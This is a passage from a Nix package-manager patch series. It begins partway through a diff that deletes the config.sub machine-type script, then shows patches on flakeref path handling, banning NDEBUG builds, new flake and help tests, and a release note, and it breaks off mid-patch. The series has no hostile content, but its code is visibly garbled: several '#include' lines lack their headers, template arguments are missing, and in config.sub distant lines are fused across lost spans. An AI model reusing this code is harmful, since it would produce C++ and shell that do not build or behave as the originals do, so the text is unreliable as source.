-    -* )
-       echo "$me: invalid option $1$help" >&2
-       exit 1 ;;
-
-    *local*)
-       # First pass through any local machine types.
-       echo "$1"
-       exit ;;
-
-    * )
-       break ;;
-  esac
-done
-
-case $# in
- 0) echo "$me: missing argument$help" >&2
-    exit 1;;
- 1) ;;
- *) echo "$me: too many arguments$help" >&2
-    exit 1;;
-esac
-
-# Split fields of configuration type
-# shellcheck disable=SC2162
-IFS="-" read field1 field2 field3 field4 <&2
-		exit 1
-		;;
-	*-*-*-*)
-		basic_machine=$field1-$field2
-		basic_os=$field3-$field4
-		;;
-	*-*-*)
-		# Ambiguous whether COMPANY is present, or skipped and KERNEL-OS is two
-		# parts
-		maybe_os=$field2-$field3
-		case $maybe_os in
-			nto-qnx* | linux-* | uclinux-uclibc* \
-			| uclinux-gnu* | kfreebsd*-gnu* | knetbsd*-gnu* | netbsd*-gnu* \
-			| netbsd*-eabi* | kopensolaris*-gnu* | cloudabi*-eabi* \
-			| storm-chaos* | os2-emx* | rtmk-nova*)
-				basic_machine=$field1
-				basic_os=$maybe_os
-				;;
-			android-linux)
-				basic_machine=$field1-unknown
-				basic_os=linux-android
-				;;
-			*)
-				basic_machine=$field1-$field2
-				basic_os=$field3
-				;;
-		esac
-		;;
-	*-*)
-		# A lone config we happen to match not fitting any pattern
-		case $field1-$field2 in
-			decstation-3100)
-				basic_machine=mips-dec
-				basic_os=
-				;;
-			*-*)
-				# Second component is usually, but not always the OS
-				case $field2 in
-					# Prevent following clause from handling this valid os
-					sun*os*)
-						basic_machine=$field1
-						basic_os=$field2
-						;;
-					# Manufacturers
-					dec* | mips* | sequent* | encore* | pc533* | sgi* | sony* \
-					| att* | 7300* | 3300* | delta* | motorola* | sun[234]* \
-					| unicom* | ibm* | next | hp | isi* | apollo | altos* \
-					| convergent* | ncr* | news | 32* | 3600* | 3100* \
-					| hitachi* | c[123]* | convex* | sun | crds | omron* | dg \
-					| ultra | tti* | harris | dolphin | highlevel | gould \
-					| cbm | ns | masscomp | apple | axis | knuth | cray \
-					| microblaze* | sim | cisco \
-					| oki | wec | wrs | winbond)
-						basic_machine=$field1-$field2
-						basic_os=
-						;;
-					*)
-						basic_machine=$field1
-						basic_os=$field2
-						;;
-				esac
-			;;
-		esac
-		;;
-	*)
-		# Convert single-component short-hands not valid as part of
-		# multi-component configurations.
-		case $field1 in
-			386bsd)
-				basic_machine=i386-pc
-				basic_os=bsd
-				;;
-			a29khif)
-				basic_machine=a29k-amd
-				basic_os=udi
-				;;
-			adobe68k)
-				basic_machine=m68010-adobe
-				basic_os=scout
-				;;
-			alliant)
-				basic_machine=fx80-alliant
-				basic_os=
-				;;
-			altos | altos3068)
-				basic_machine=m68k-altos
-				basic_os=
-				;;
-			am29k)
-				basic_machine=a29k-none
-				basic_os=bsd
-				;;
-			amdahl)
-				basic_machine=580-amdahl
-				basic_os=sysv
-				;;
-			amiga)
-				basic_machine=m68k-unknown
-				basic_os=
-				;;
-			amigaos | amigados)
-				basic_machine=m68k-unknown
-				basic_os=amigaos
-				;;
-			amigaunix | amix)
-				basic_machine=m68k-unknown
-				basic_os=sysv4
-				;;
-			apollo68)
-				basic_machine=m68k-apollo
-				basic_os=sysv
-				;;
-			apollo68bsd)
-				basic_machine=m68k-apollo
-				basic_os=bsd
-				;;
-			aros)
-				basic_machine=i386-pc
-				basic_os=aros
-				;;
-			aux)
-				basic_machine=m68k-apple
-				basic_os=aux
-				;;
-			balance)
-				basic_machine=ns32k-sequent
-				basic_os=dynix
-				;;
-			blackfin)
-				basic_machine=bfin-unknown
-				basic_os=linux
-				;;
-			cegcc)
-				basic_machine=arm-unknown
-				basic_os=cegcc
-				;;
-			convex-c1)
-				basic_machine=c1-convex
-				basic_os=bsd
-				;;
-			convex-c2)
-				basic_machine=c2-convex
-				basic_os=bsd
-				;;
-			convex-c32)
-				basic_machine=c32-convex
-				basic_os=bsd
-				;;
-			convex-c34)
-				basic_machine=c34-convex
-				basic_os=bsd
-				;;
-			convex-c38)
-				basic_machine=c38-convex
-				basic_os=bsd
-				;;
-			cray)
-				basic_machine=j90-cray
-				basic_os=unicos
-				;;
-			crds | unos)
-				basic_machine=m68k-crds
-				basic_os=
-				;;
-			da30)
-				basic_machine=m68k-da30
-				basic_os=
-				;;
-			decstation | pmax | pmin | dec3100 | decstatn)
-				basic_machine=mips-dec
-				basic_os=
-				;;
-			delta88)
-				basic_machine=m88k-motorola
-				basic_os=sysv3
-				;;
-			dicos)
-				basic_machine=i686-pc
-				basic_os=dicos
-				;;
-			djgpp)
-				basic_machine=i586-pc
-				basic_os=msdosdjgpp
-				;;
-			ebmon29k)
-				basic_machine=a29k-amd
-				basic_os=ebmon
-				;;
-			es1800 | OSE68k | ose68k | ose | OSE)
-				basic_machine=m68k-ericsson
-				basic_os=ose
-				;;
-			gmicro)
-				basic_machine=tron-gmicro
-				basic_os=sysv
-				;;
-			go32)
-				basic_machine=i386-pc
-				basic_os=go32
-				;;
-			h8300hms)
-				basic_machine=h8300-hitachi
-				basic_os=hms
-				;;
-			h8300xray)
-				basic_machine=h8300-hitachi
-				basic_os=xray
-				;;
-			h8500hms)
-				basic_machine=h8500-hitachi
-				basic_os=hms
-				;;
-			harris)
-				basic_machine=m88k-harris
-				basic_os=sysv3
-				;;
-			hp300 | hp300hpux)
-				basic_machine=m68k-hp
-				basic_os=hpux
-				;;
-			hp300bsd)
-				basic_machine=m68k-hp
-				basic_os=bsd
-				;;
-			hppaosf)
-				basic_machine=hppa1.1-hp
-				basic_os=osf
-				;;
-			hppro)
-				basic_machine=hppa1.1-hp
-				basic_os=proelf
-				;;
-			i386mach)
-				basic_machine=i386-mach
-				basic_os=mach
-				;;
-			isi68 | isi)
-				basic_machine=m68k-isi
-				basic_os=sysv
-				;;
-			m68knommu)
-				basic_machine=m68k-unknown
-				basic_os=linux
-				;;
-			magnum | m3230)
-				basic_machine=mips-mips
-				basic_os=sysv
-				;;
-			merlin)
-				basic_machine=ns32k-utek
-				basic_os=sysv
-				;;
-			mingw64)
-				basic_machine=x86_64-pc
-				basic_os=mingw64
-				;;
-			mingw32)
-				basic_machine=i686-pc
-				basic_os=mingw32
-				;;
-			mingw32ce)
-				basic_machine=arm-unknown
-				basic_os=mingw32ce
-				;;
-			monitor)
-				basic_machine=m68k-rom68k
-				basic_os=coff
-				;;
-			morphos)
-				basic_machine=powerpc-unknown
-				basic_os=morphos
-				;;
-			moxiebox)
-				basic_machine=moxie-unknown
-				basic_os=moxiebox
-				;;
-			msdos)
-				basic_machine=i386-pc
-				basic_os=msdos
-				;;
-			msys)
-				basic_machine=i686-pc
-				basic_os=msys
-				;;
-			mvs)
-				basic_machine=i370-ibm
-				basic_os=mvs
-				;;
-			nacl)
-				basic_machine=le32-unknown
-				basic_os=nacl
-				;;
-			ncr3000)
-				basic_machine=i486-ncr
-				basic_os=sysv4
-				;;
-			netbsd386)
-				basic_machine=i386-pc
-				basic_os=netbsd
-				;;
-			netwinder)
-				basic_machine=armv4l-rebel
-				basic_os=linux
-				;;
-			news | news700 | news800 | news900)
-				basic_machine=m68k-sony
-				basic_os=newsos
-				;;
-			news1000)
-				basic_machine=m68030-sony
-				basic_os=newsos
-				;;
-			necv70)
-				basic_machine=v70-nec
-				basic_os=sysv
-				;;
-			nh3000)
-				basic_machine=m68k-harris
-				basic_os=cxux
-				;;
-			nh[45]000)
-				basic_machine=m88k-harris
-				basic_os=cxux
-				;;
-			nindy960)
-				basic_machine=i960-intel
-				basic_os=nindy
-				;;
-			mon960)
-				basic_machine=i960-intel
-				basic_os=mon960
-				;;
-			nonstopux)
-				basic_machine=mips-compaq
-				basic_os=nonstopux
-				;;
-			os400)
-				basic_machine=powerpc-ibm
-				basic_os=os400
-				;;
-			OSE68000 | ose68000)
-				basic_machine=m68000-ericsson
-				basic_os=ose
-				;;
-			os68k)
-				basic_machine=m68k-none
-				basic_os=os68k
-				;;
-			paragon)
-				basic_machine=i860-intel
-				basic_os=osf
-				;;
-			parisc)
-				basic_machine=hppa-unknown
-				basic_os=linux
-				;;
-			psp)
-				basic_machine=mipsallegrexel-sony
-				basic_os=psp
-				;;
-			pw32)
-				basic_machine=i586-unknown
-				basic_os=pw32
-				;;
-			rdos | rdos64)
-				basic_machine=x86_64-pc
-				basic_os=rdos
-				;;
-			rdos32)
-				basic_machine=i386-pc
-				basic_os=rdos
-				;;
-			rom68k)
-				basic_machine=m68k-rom68k
-				basic_os=coff
-				;;
-			sa29200)
-				basic_machine=a29k-amd
-				basic_os=udi
-				;;
-			sei)
-				basic_machine=mips-sei
-				basic_os=seiux
-				;;
-			sequent)
-				basic_machine=i386-sequent
-				basic_os=
-				;;
-			sps7)
-				basic_machine=m68k-bull
-				basic_os=sysv2
-				;;
-			st2000)
-				basic_machine=m68k-tandem
-				basic_os=
-				;;
-			stratus)
-				basic_machine=i860-stratus
-				basic_os=sysv4
-				;;
-			sun2)
-				basic_machine=m68000-sun
-				basic_os=
-				;;
-			sun2os3)
-				basic_machine=m68000-sun
-				basic_os=sunos3
-				;;
-			sun2os4)
-				basic_machine=m68000-sun
-				basic_os=sunos4
-				;;
-			sun3)
-				basic_machine=m68k-sun
-				basic_os=
-				;;
-			sun3os3)
-				basic_machine=m68k-sun
-				basic_os=sunos3
-				;;
-			sun3os4)
-				basic_machine=m68k-sun
-				basic_os=sunos4
-				;;
-			sun4)
-				basic_machine=sparc-sun
-				basic_os=
-				;;
-			sun4os3)
-				basic_machine=sparc-sun
-				basic_os=sunos3
-				;;
-			sun4os4)
-				basic_machine=sparc-sun
-				basic_os=sunos4
-				;;
-			sun4sol2)
-				basic_machine=sparc-sun
-				basic_os=solaris2
-				;;
-			sun386 | sun386i | roadrunner)
-				basic_machine=i386-sun
-				basic_os=
-				;;
-			sv1)
-				basic_machine=sv1-cray
-				basic_os=unicos
-				;;
-			symmetry)
-				basic_machine=i386-sequent
-				basic_os=dynix
-				;;
-			t3e)
-				basic_machine=alphaev5-cray
-				basic_os=unicos
-				;;
-			t90)
-				basic_machine=t90-cray
-				basic_os=unicos
-				;;
-			toad1)
-				basic_machine=pdp10-xkl
-				basic_os=tops20
-				;;
-			tpf)
-				basic_machine=s390x-ibm
-				basic_os=tpf
-				;;
-			udi29k)
-				basic_machine=a29k-amd
-				basic_os=udi
-				;;
-			ultra3)
-				basic_machine=a29k-nyu
-				basic_os=sym1
-				;;
-			v810 | necv810)
-				basic_machine=v810-nec
-				basic_os=none
-				;;
-			vaxv)
-				basic_machine=vax-dec
-				basic_os=sysv
-				;;
-			vms)
-				basic_machine=vax-dec
-				basic_os=vms
-				;;
-			vsta)
-				basic_machine=i386-pc
-				basic_os=vsta
-				;;
-			vxworks960)
-				basic_machine=i960-wrs
-				basic_os=vxworks
-				;;
-			vxworks68)
-				basic_machine=m68k-wrs
-				basic_os=vxworks
-				;;
-			vxworks29k)
-				basic_machine=a29k-wrs
-				basic_os=vxworks
-				;;
-			xbox)
-				basic_machine=i686-pc
-				basic_os=mingw32
-				;;
-			ymp)
-				basic_machine=ymp-cray
-				basic_os=unicos
-				;;
-			*)
-				basic_machine=$1
-				basic_os=
-				;;
-		esac
-		;;
-esac
-
-# Decode 1-component or ad-hoc basic machines
-case $basic_machine in
-	# Here we handle the default manufacturer of certain CPU types.  It is in
-	# some cases the only manufacturer, in others, it is the most popular.
-	w89k)
-		cpu=hppa1.1
-		vendor=winbond
-		;;
-	op50n)
-		cpu=hppa1.1
-		vendor=oki
-		;;
-	op60c)
-		cpu=hppa1.1
-		vendor=oki
-		;;
-	ibm*)
-		cpu=i370
-		vendor=ibm
-		;;
-	orion105)
-		cpu=clipper
-		vendor=highlevel
-		;;
-	mac | mpw | mac-mpw)
-		cpu=m68k
-		vendor=apple
-		;;
-	pmac | pmac-mpw)
-		cpu=powerpc
-		vendor=apple
-		;;
-
-	# Recognize the various machine names and aliases which stand
-	# for a CPU type and a company and sometimes even an OS.
-	3b1 | 7300 | 7300-att | att-7300 | pc7300 | safari | unixpc)
-		cpu=m68000
-		vendor=att
-		;;
-	3b*)
-		cpu=we32k
-		vendor=att
-		;;
-	bluegene*)
-		cpu=powerpc
-		vendor=ibm
-		basic_os=cnk
-		;;
-	decsystem10* | dec10*)
-		cpu=pdp10
-		vendor=dec
-		basic_os=tops10
-		;;
-	decsystem20* | dec20*)
-		cpu=pdp10
-		vendor=dec
-		basic_os=tops20
-		;;
-	delta | 3300 | motorola-3300 | motorola-delta \
-	      | 3300-motorola | delta-motorola)
-		cpu=m68k
-		vendor=motorola
-		;;
-	dpx2*)
-		cpu=m68k
-		vendor=bull
-		basic_os=sysv3
-		;;
-	encore | umax | mmax)
-		cpu=ns32k
-		vendor=encore
-		;;
-	elxsi)
-		cpu=elxsi
-		vendor=elxsi
-		basic_os=${basic_os:-bsd}
-		;;
-	fx2800)
-		cpu=i860
-		vendor=alliant
-		;;
-	genix)
-		cpu=ns32k
-		vendor=ns
-		;;
-	h3050r* | hiux*)
-		cpu=hppa1.1
-		vendor=hitachi
-		basic_os=hiuxwe2
-		;;
-	hp3k9[0-9][0-9] | hp9[0-9][0-9])
-		cpu=hppa1.0
-		vendor=hp
-		;;
-	hp9k2[0-9][0-9] | hp9k31[0-9])
-		cpu=m68000
-		vendor=hp
-		;;
-	hp9k3[2-9][0-9])
-		cpu=m68k
-		vendor=hp
-		;;
-	hp9k6[0-9][0-9] | hp6[0-9][0-9])
-		cpu=hppa1.0
-		vendor=hp
-		;;
-	hp9k7[0-79][0-9] | hp7[0-79][0-9])
-		cpu=hppa1.1
-		vendor=hp
-		;;
-	hp9k78[0-9] | hp78[0-9])
-		# FIXME: really hppa2.0-hp
-		cpu=hppa1.1
-		vendor=hp
-		;;
-	hp9k8[67]1 | hp8[67]1 | hp9k80[24] | hp80[24] | hp9k8[78]9 | hp8[78]9 | hp9k893 | hp893)
-		# FIXME: really hppa2.0-hp
-		cpu=hppa1.1
-		vendor=hp
-		;;
-	hp9k8[0-9][13679] | hp8[0-9][13679])
-		cpu=hppa1.1
-		vendor=hp
-		;;
-	hp9k8[0-9][0-9] | hp8[0-9][0-9])
-		cpu=hppa1.0
-		vendor=hp
-		;;
-	i*86v32)
-		cpu=$(echo "$1" | sed -e 's/86.*/86/')
-		vendor=pc
-		basic_os=sysv32
-		;;
-	i*86v4*)
-		cpu=$(echo "$1" | sed -e 's/86.*/86/')
-		vendor=pc
-		basic_os=sysv4
-		;;
-	i*86v)
-		cpu=$(echo "$1" | sed -e 's/86.*/86/')
-		vendor=pc
-		basic_os=sysv
-		;;
-	i*86sol2)
-		cpu=$(echo "$1" | sed -e 's/86.*/86/')
-		vendor=pc
-		basic_os=solaris2
-		;;
-	j90 | j90-cray)
-		cpu=j90
-		vendor=cray
-		basic_os=${basic_os:-unicos}
-		;;
-	iris | iris4d)
-		cpu=mips
-		vendor=sgi
-		case $basic_os in
-		    irix*)
-			;;
-		    *)
-			basic_os=irix4
-			;;
-		esac
-		;;
-	miniframe)
-		cpu=m68000
-		vendor=convergent
-		;;
-	*mint | mint[0-9]* | *MiNT | *MiNT[0-9]*)
-		cpu=m68k
-		vendor=atari
-		basic_os=mint
-		;;
-	news-3600 | risc-news)
-		cpu=mips
-		vendor=sony
-		basic_os=newsos
-		;;
-	next | m*-next)
-		cpu=m68k
-		vendor=next
-		case $basic_os in
-		    openstep*)
-		        ;;
-		    nextstep*)
-			;;
-		    ns2*)
-		      basic_os=nextstep2
-			;;
-		    *)
-		      basic_os=nextstep3
-			;;
-		esac
-		;;
-	np1)
-		cpu=np1
-		vendor=gould
-		;;
-	op50n-* | op60c-*)
-		cpu=hppa1.1
-		vendor=oki
-		basic_os=proelf
-		;;
-	pa-hitachi)
-		cpu=hppa1.1
-		vendor=hitachi
-		basic_os=hiuxwe2
-		;;
-	pbd)
-		cpu=sparc
-		vendor=tti
-		;;
-	pbb)
-		cpu=m68k
-		vendor=tti
-		;;
-	pc532)
-		cpu=ns32k
-		vendor=pc532
-		;;
-	pn)
-		cpu=pn
-		vendor=gould
-		;;
-	power)
-		cpu=power
-		vendor=ibm
-		;;
-	ps2)
-		cpu=i386
-		vendor=ibm
-		;;
-	rm[46]00)
-		cpu=mips
-		vendor=siemens
-		;;
-	rtpc | rtpc-*)
-		cpu=romp
-		vendor=ibm
-		;;
-	sde)
-		cpu=mipsisa32
-		vendor=sde
-		basic_os=${basic_os:-elf}
-		;;
-	simso-wrs)
-		cpu=sparclite
-		vendor=wrs
-		basic_os=vxworks
-		;;
-	tower | tower-32)
-		cpu=m68k
-		vendor=ncr
-		;;
-	vpp*|vx|vx-*)
-		cpu=f301
-		vendor=fujitsu
-		;;
-	w65)
-		cpu=w65
-		vendor=wdc
-		;;
-	w89k-*)
-		cpu=hppa1.1
-		vendor=winbond
-		basic_os=proelf
-		;;
-	none)
-		cpu=none
-		vendor=none
-		;;
-	leon|leon[3-9])
-		cpu=sparc
-		vendor=$basic_machine
-		;;
-	leon-*|leon[3-9]-*)
-		cpu=sparc
-		vendor=$(echo "$basic_machine" | sed 's/-.*//')
-		;;
-
-	*-*)
-		# shellcheck disable=SC2162
-		IFS="-" read cpu vendor <&2
-				exit 1
-				;;
-		esac
-		;;
-esac
-
-# Here we canonicalize certain aliases for manufacturers.
-case $vendor in
-	digital*)
-		vendor=dec
-		;;
-	commodore*)
-		vendor=cbm
-		;;
-	*)
-		;;
-esac
-
-# Decode manufacturer-specific aliases for certain operating systems.
-
-if test x$basic_os != x
-then
-
-# First recognize some ad-hoc caes, or perhaps split kernel-os, or else just
-# set os.
-case $basic_os in
-	gnu/linux*)
-		kernel=linux
-		os=$(echo $basic_os | sed -e 's|gnu/linux|gnu|')
-		;;
-	os2-emx)
-		kernel=os2
-		os=$(echo $basic_os | sed -e 's|os2-emx|emx|')
-		;;
-	nto-qnx*)
-		kernel=nto
-		os=$(echo $basic_os | sed -e 's|nto-qnx|qnx|')
-		;;
-	*-*)
-		# shellcheck disable=SC2162
-		IFS="-" read kernel os <&2
-		exit 1
-		;;
-esac
-
-# As a final step for OS-related things, validate the OS-kernel combination
-# (given a valid OS), if there is a kernel.
-case $kernel-$os in
-	linux-gnu* | linux-dietlibc* | linux-android* | linux-newlib* | linux-musl* | linux-uclibc* )
-		;;
-	uclinux-uclibc* )
-		;;
-	-dietlibc* | -newlib* | -musl* | -uclibc* )
-		# These are just libc implementations, not actual OSes, and thus
-		# require a kernel.
-		echo "Invalid configuration \`$1': libc \`$os' needs explicit kernel." 1>&2
-		exit 1
-		;;
-	kfreebsd*-gnu* | kopensolaris*-gnu*)
-		;;
-	vxworks-simlinux | vxworks-simwindows | vxworks-spe)
-		;;
-	nto-qnx*)
-		;;
-	os2-emx)
-		;;
-	*-eabi* | *-gnueabi*)
-		;;
-	-*)
-		# Blank kernel with real OS is always fine.
-		;;
-	*-*)
-		echo "Invalid configuration \`$1': Kernel \`$kernel' not known to work with OS \`$os'." 1>&2
-		exit 1
-		;;
-esac
-
-# Here we handle the case where we know the os, and the CPU type, but not the
-# manufacturer.  We pick the logical manufacturer.
-case $vendor in
-	unknown)
-		case $cpu-$os in
-			*-riscix*)
-				vendor=acorn
-				;;
-			*-sunos*)
-				vendor=sun
-				;;
-			*-cnk* | *-aix*)
-				vendor=ibm
-				;;
-			*-beos*)
-				vendor=be
-				;;
-			*-hpux*)
-				vendor=hp
-				;;
-			*-mpeix*)
-				vendor=hp
-				;;
-			*-hiux*)
-				vendor=hitachi
-				;;
-			*-unos*)
-				vendor=crds
-				;;
-			*-dgux*)
-				vendor=dg
-				;;
-			*-luna*)
-				vendor=omron
-				;;
-			*-genix*)
-				vendor=ns
-				;;
-			*-clix*)
-				vendor=intergraph
-				;;
-			*-mvs* | *-opened*)
-				vendor=ibm
-				;;
-			*-os400*)
-				vendor=ibm
-				;;
-			s390-* | s390x-*)
-				vendor=ibm
-				;;
-			*-ptx*)
-				vendor=sequent
-				;;
-			*-tpf*)
-				vendor=ibm
-				;;
-			*-vxsim* | *-vxworks* | *-windiss*)
-				vendor=wrs
-				;;
-			*-aux*)
-				vendor=apple
-				;;
-			*-hms*)
-				vendor=hitachi
-				;;
-			*-mpw* | *-macos*)
-				vendor=apple
-				;;
-			*-*mint | *-mint[0-9]* | *-*MiNT | *-MiNT[0-9]*)
-				vendor=atari
-				;;
-			*-vos*)
-				vendor=stratus
-				;;
-		esac
-		;;
-esac
-
-echo "$cpu-$vendor-${kernel:+$kernel-}$os"
-exit
-
-# Local variables:
-# eval: (add-hook 'before-save-hook 'time-stamp)
-# time-stamp-start: "timestamp='"
-# time-stamp-format: "%:y-%02m-%02d"
-# time-stamp-end: "'"
-# End:

From 11a1dcc43b3830dc25319719bccc71572136c57d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Wed, 28 Feb 2024 16:59:06 +0100
Subject: [PATCH 550/654] Properly fail on flakerefs that don't point to a
 directory

Directly fail if a flakeref points to something that isn't a directory
instead of falling back to the logic of trying to look up the hierarchy
to find a valid flake root.

Fix https://github.com/NixOS/nix/issues/9868
---
 src/libexpr/flake/flakeref.cc          | 6 +++---
 tests/functional/flakes/search-root.sh | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc
index 86a0982f3..09b5cecbc 100644
--- a/src/libexpr/flake/flakeref.cc
+++ b/src/libexpr/flake/flakeref.cc
@@ -102,6 +102,9 @@ std::pair parsePathFlakeRefWithFragment(
 
         if (isFlake) {
 
+            if (!S_ISDIR(lstat(path).st_mode))
+                throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
+
             if (!allowMissing && !pathExists(path + "/flake.nix")){
                 notice("path '%s' does not contain a 'flake.nix', searching up",path);
 
@@ -124,9 +127,6 @@ std::pair parsePathFlakeRefWithFragment(
                     throw BadURL("could not find a flake.nix file");
             }
 
-            if (!S_ISDIR(lstat(path).st_mode))
-                throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
-
             if (!allowMissing && !pathExists(path + "/flake.nix"))
                 throw BadURL("path '%s' is not a flake (because it doesn't contain a 'flake.nix' file)", path);
 
diff --git a/tests/functional/flakes/search-root.sh b/tests/functional/flakes/search-root.sh
index d8586dc8a..6b137aa86 100644
--- a/tests/functional/flakes/search-root.sh
+++ b/tests/functional/flakes/search-root.sh
@@ -22,7 +22,7 @@ mkdir subdir
 pushd subdir
 
 success=("" . .# .#test ../subdir ../subdir#test "$PWD")
-failure=("path:$PWD")
+failure=("path:$PWD" "../simple.nix")
 
 for i in "${success[@]}"; do
     nix build $i || fail "flake should be found by searching up directories"

From 2f0bc6373ce1cc62f6b0ec955a227762904a66df Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Sat, 2 Mar 2024 10:34:20 +0100
Subject: [PATCH 551/654] Don't fail if a flakeref directly points to the
 flake.nix

Just warn and redirect it to the parent directory
---
 src/libexpr/flake/flakeref.cc | 14 ++++++++++++--
 1 file changed, 12 insertions(+), 2 deletions(-)

diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc
index 09b5cecbc..6c534f429 100644
--- a/src/libexpr/flake/flakeref.cc
+++ b/src/libexpr/flake/flakeref.cc
@@ -102,8 +102,18 @@ std::pair parsePathFlakeRefWithFragment(
 
         if (isFlake) {
 
-            if (!S_ISDIR(lstat(path).st_mode))
-                throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
+            if (!S_ISDIR(lstat(path).st_mode)) {
+                if (baseNameOf(path) == "flake.nix") {
+                    // Be gentle with people who accidentally write `/foo/bar/flake.nix` instead of `/foo/bar`
+                    warn(
+                        "Path '%s' should point at the directory containing the 'flake.nix' file, not the file itself. "
+                        "Pretending that you meant '%s'"
+                        , path, dirOf(path));
+                    path = dirOf(path);
+                } else {
+                    throw BadURL("path '%s' is not a flake (because it's not a directory)", path);
+                }
+            }
 
             if (!allowMissing && !pathExists(path + "/flake.nix")){
                 notice("path '%s' does not contain a 'flake.nix', searching up",path);

From 2625e9fb0a787809e492cacdab6707b1e4863adf Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Fri, 1 Mar 2024 13:07:01 -0800
Subject: [PATCH 552/654] Ban building Nix with NDEBUG

When reviewing old PRs, I found that #9997 adds some code to ensure one
particular assert is always present. But, removing asserts isn't
something we do in our own release builds either in the flake here or in
nixpkgs, and is plainly a bad idea that increases support burden,
especially if other distros make bad choices of build flags in their Nix
packaging.

For context, the assert macro in the C standard is defined to do nothing
if NDEBUG is set.

There is no way in our build system to set -DNDEBUG without manually
adding it to CFLAGS, so this is simply a configuration we do not use.
Let's ban it at compile time.

I put this preprocessor directive in src/libutil/util.cc because it is not
obvious where else to put it, and it seems like the most logical file
since you are not getting a usable nix without it.
---
 src/libutil/util.cc                 | 4 ++++
 tests/unit/libstore/outputs-spec.cc | 2 --
 2 files changed, 4 insertions(+), 2 deletions(-)

diff --git a/src/libutil/util.cc b/src/libutil/util.cc
index 75bb31c9b..06124bf15 100644
--- a/src/libutil/util.cc
+++ b/src/libutil/util.cc
@@ -9,6 +9,10 @@
 
 #include 
 
+#ifdef NDEBUG
+#error "Nix may not be built with assertions disabled (i.e. with -DNDEBUG)."
+#endif
+
 namespace nix {
 
 void initLibUtil() {
diff --git a/tests/unit/libstore/outputs-spec.cc b/tests/unit/libstore/outputs-spec.cc
index 456196be1..63cde681b 100644
--- a/tests/unit/libstore/outputs-spec.cc
+++ b/tests/unit/libstore/outputs-spec.cc
@@ -6,11 +6,9 @@
 
 namespace nix {
 
-#ifndef NDEBUG
 TEST(OutputsSpec, no_empty_names) {
     ASSERT_DEATH(OutputsSpec::Names { std::set { } }, "");
 }
-#endif
 
 #define TEST_DONT_PARSE(NAME, STR)           \
     TEST(OutputsSpec, bad_ ## NAME) {        \

From b1ad729add0714cd123ea96497adf0ef14f683c4 Mon Sep 17 00:00:00 2001
From: Olmo Kramer 
Date: Sun, 3 Mar 2024 13:51:40 +0100
Subject: [PATCH 553/654] Add test for `nix flake update` with multiple inputs

---
 tests/functional/flakes/flakes.sh | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/tests/functional/flakes/flakes.sh b/tests/functional/flakes/flakes.sh
index 7506b6b3b..427290883 100644
--- a/tests/functional/flakes/flakes.sh
+++ b/tests/functional/flakes/flakes.sh
@@ -564,6 +564,16 @@ nix flake lock "$flake3Dir"
 nix flake update flake2/flake1 --flake "$flake3Dir"
 [[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
 
+# Test updating multiple inputs.
+nix flake lock "$flake3Dir" --override-input flake1 flake1/master/$hash1
+nix flake lock "$flake3Dir" --override-input flake2/flake1 flake1/master/$hash1
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash1 ]]
+
+nix flake update flake1 flake2/flake1 --flake "$flake3Dir"
+[[ $(jq -r .nodes.flake1.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+[[ $(jq -r .nodes.flake1_2.locked.rev "$flake3Dir/flake.lock") =~ $hash2 ]]
+
 # Test 'nix flake metadata --json'.
 nix flake metadata "$flake3Dir" --json | jq .
 

From e6b9432542673a451b058ad2f0a7f1b4c20d3fbf Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 12:48:21 +0100
Subject: [PATCH 554/654] Add release note

---
 doc/manual/rl-next/arg-from-file.md | 9 +++++++++
 1 file changed, 9 insertions(+)
 create mode 100644 doc/manual/rl-next/arg-from-file.md

diff --git a/doc/manual/rl-next/arg-from-file.md b/doc/manual/rl-next/arg-from-file.md
new file mode 100644
index 000000000..5849b11a3
--- /dev/null
+++ b/doc/manual/rl-next/arg-from-file.md
@@ -0,0 +1,9 @@
+---
+synopsis: "CLI options `--arg-from-file` and `--arg-from-stdin`"
+prs: 10122
+---
+
+The new CLI option `--arg-from-file` *name* *path* passes the contents
+of file *path* as a string value via the function argument *name* to a
+Nix expression. Similarly, the new option `--arg-from-stdin` *name*
+reads the contents of the string from standard input.

From cbfd211b39fe053bb8a7ff416a7bf1c09b3d1fbf Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 12:49:32 +0100
Subject: [PATCH 555/654] Fix build

---
 src/libcmd/common-eval-args.hh | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 7548bd3b7..25ce5b9da 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -6,6 +6,8 @@
 #include "common-args.hh"
 #include "search-path.hh"
 
+#include 
+
 namespace nix {
 
 class Store;

From 4b15ca2ffb710d96eb34ac47683abdd85d236f92 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Mon, 4 Mar 2024 16:07:03 +0100
Subject: [PATCH 556/654] add tests for showing help

---
 package.nix               |  2 +
 tests/functional/help.sh  | 79 +++++++++++++++++++++++++++++++++++++++
 tests/functional/local.mk |  3 +-
 3 files changed, 83 insertions(+), 1 deletion(-)
 create mode 100644 tests/functional/help.sh

diff --git a/package.nix b/package.nix
index 20796a386..a90973b4c 100644
--- a/package.nix
+++ b/package.nix
@@ -24,6 +24,7 @@
 , libgit2
 , libseccomp
 , libsodium
+, man
 , lowdown
 , mdbook
 , mdbook-linkcheck
@@ -213,6 +214,7 @@ in {
     git
     mercurial
     openssh
+    man # for testing `nix-* --help`
   ] ++ lib.optionals (doInstallCheck || enableManual) [
